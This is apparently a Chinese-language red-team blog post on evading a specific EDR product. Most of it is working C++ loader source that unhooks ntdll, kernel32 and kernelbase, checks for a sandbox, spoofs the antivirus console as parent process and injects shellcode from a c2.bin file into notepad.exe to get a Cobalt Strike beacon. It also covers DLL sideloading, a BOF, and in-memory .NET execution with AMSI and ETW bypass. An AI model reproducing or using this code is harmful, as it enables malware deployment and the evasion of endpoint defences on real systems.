殺軟分析

x64dgb簡單調試發現該edr在r3環對ntdll.dll和kernel32.dll關鍵函數均存在hook，這里硬盤讀取原來的dll進行重新加載，原理如圖

loader

// dllmain.cpp : 定義 DLL 應用程序的入口點。
#include "pch.h"
#include <Windows.h>
#include <TlHelp32.h>
#include<stdlib.h>
#include<iostream>
#include <psapi.h>BOOL  EnableDebugPrivilege()
{HANDLE token_handle;LUID luid;TOKEN_PRIVILEGES tkp;//打開訪問令牌if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle)){return   FALSE;}//查詢luidif (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)){CloseHandle(token_handle);return   FALSE;}tkp.PrivilegeCount = 1;tkp.Privileges[0].Luid = luid;tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;//調整訪問令牌權限if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL)){CloseHandle(token_handle);return   FALSE;}return TRUE;
}typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,ULONG CreateThreadFlags,SIZE_T ZeroBits,SIZE_T StackSize,SIZE_T MaximumStackSize,LPVOID pUnkown);
typedef FARPROC
(WINAPI* pGetProcAddress)(_In_ HMODULE hModule,_In_ LPCSTR lpProcName);
typedef HMODULE
(WINAPI* pLoadLibraryA)(_In_ LPCSTR lpLibFileName);int ppidfunc(DWORD pid, LPVOID lpBuffer, DWORD dwFileSize) {PROCESS_INFORMATION pi = { 0 };STARTUPINFOEXA si = { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb = sizeof(STARTUPINFOEXA);//getparenthandleHANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessCreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);LPVOID lpBaseAddress = VirtualAllocEx(pi.hProcess, NULL, dwFileSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)lpBuffer, dwFileSize, NULL);HANDLE hRemoteThread = NULL;DWORD ZwRet = 0;HMODULE hNtdll = LoadLibrary(L"ntdll.dll");typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, pi.hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, 0, 0, 0, NULL);WaitForSingleObject(hRemoteThread, INFINITE);CloseHandle(pi.hThread);CloseHandle(pi.hProcess);CloseHandle(parentProcessHandle);return 0;
}
BOOL box()
{MEMORYSTATUSEX memoryStatus;memoryStatus.dwLength = sizeof(MEMORYSTATUSEX);GlobalMemoryStatusEx(&memoryStatus);DWORDLONG RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024 / 1024;  //內存RAMMB（G）if (RAMMB > 2){SYSTEM_INFO systemInfo;GetSystemInfo(&systemInfo);DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;if (numberOfProcessors > 4)return FALSE;}elsereturn TRUE;
}
BOOL  isPrime(long long number) {if (number <= 1)return FALSE;int i = 2;for (; i <= number; ++i) {if (number % i == 0) {return FALSE;}}return TRUE;
}DWORD UNHOOKntdll(char* dllname) {MODULEINFO mi = {};HMODULE ntdllModule = GetModuleHandleA(dllname);GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));char nn[100] = { 0 };LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;//mi.lpBaseOfDll=ntdllModulesprintf_s(nn, "c:\\windows\\system32\\%s", dllname);HANDLE ntdllFile = CreateFileA((LPCSTR)nn, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {DWORD oldProtection = 0;bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);}}CloseHandle(ntdllFile);CloseHandle(ntdllMapping);FreeLibrary(ntdllModule);return 0;
}
DWORD FindProcPid() {HANDLE hProcessSnap = NULL;BOOL bRet = FALSE;PROCESSENTRY32 pe32 = { 0 };DWORD dwProcessId = 0;hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);pe32.dwSize = sizeof(PROCESSENTRY32);if (hProcessSnap != INVALID_HANDLE_VALUE) {bRet = Process32First(hProcessSnap, &pe32);while (bRet) {if (!_wcsicmp(pe32.szExeFile, L"EPConsole.exe")) {dwProcessId = pe32.th32ProcessID;break;}bRet = Process32Next(hProcessSnap, &pe32);}}return dwProcessId;
}
int killme()
{char g_TargetFile[] = "c2.bin";//打開文件HANDLE hFile = CreateFileA((LPCSTR)g_TargetFile, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);//獲取文件大小DWORD dwFileSize = GetFileSize(hFile, NULL);//申請一塊內存空間PVOID lpBuffer = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);//將內存讀取到申請的內存空間DWORD dwReadLength = 0;ReadFile(hFile, lpBuffer, dwFileSize, &dwReadLength, NULL);//關閉文件CloseHandle(hFile);if (box()) {isPrime(1000000000000000003);}else {DWORD pid = FindProcPid();UNHOOKntdll((char*)"ntdll.dll");UNHOOKntdll((char*)"kernel32.dll");UNHOOKntdll((char*)"kernelbase.dll");//EnableDebugPrivilege();//對于獲取system權限的進程而言需要管理員權限啟動ppidfunc(pid, lpBuffer, dwFileSize);}return 0;
}
extern "C" _declspec(dllexport) void test()
{killme();
}BOOL APIENTRY DllMain(HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved
)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;
}

這里偽造成殺軟的子進程形成父進程信任鏈，通過ZwCreateThreadEx對子進程注入上線

通過白名單+偽簽名的黑dll上線，發現執行命令就死，猜測應該是cs的shell功能觸發了edr的啟發式導致被殺

BOF

這里通過BOF執行命令

#include "bofdefs.h"extern "C" {void go(char* buff, int len) {DFR_LOCAL(KERNEL32, CreateToolhelp32Snapshot);DFR_LOCAL(KERNEL32, Process32First);DFR_LOCAL(KERNEL32, Process32Next);DFR_LOCAL(KERNEL32, CloseHandle);//add ...PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap == INVALID_HANDLE_VALUE){BeaconPrintf(CALLBACK_OUTPUT," CreateToolhelp32Snapshot調用失敗！ \n");return;}BOOL bMore = Process32First(hProcessSnap, &pe32);while (bMore){BeaconPrintf(CALLBACK_OUTPUT, "Process Name is : %s\t", pe32.szExeFile);BeaconPrintf(CALLBACK_OUTPUT, "Process ID is： % d \n", pe32.th32ProcessID);bMore = Process32Next(hProcessSnap, &pe32);}CloseHandle(hProcessSnap);}}
#ifndef BOF
void main(int argc, char* argv[]) {go(NULL, 0);
}#endif

inline-execute a.obj

.NET

發現還可以內存加載.NET,需要bypass etw和amsi

using System;
using System.Runtime.InteropServices;
namespace coleak
{class winfun{[DllImport("User32.dll")]public static extern int MessageBox(IntPtr h, string m, string c, uint type);[DllImport("kernel32.dll", EntryPoint = "Beep")]public static extern bool mymethod(uint frequency, uint duration);}class Program{static void Main(string[] args){winfun winfun = new winfun();winfun.MessageBox((IntPtr)0, "yueyy", "coleak", (uint)0);Random random = new Random();for (int i = 0; i < 10000; i++){winfun.mymethod((uint)random.Next(10000), 100);}Console.ReadLine();}}
}

inlineExecute-Assembly --dotnetassembly test.exe  --amsi --etw --appdomain forRealLegit --mailslot forRealLegit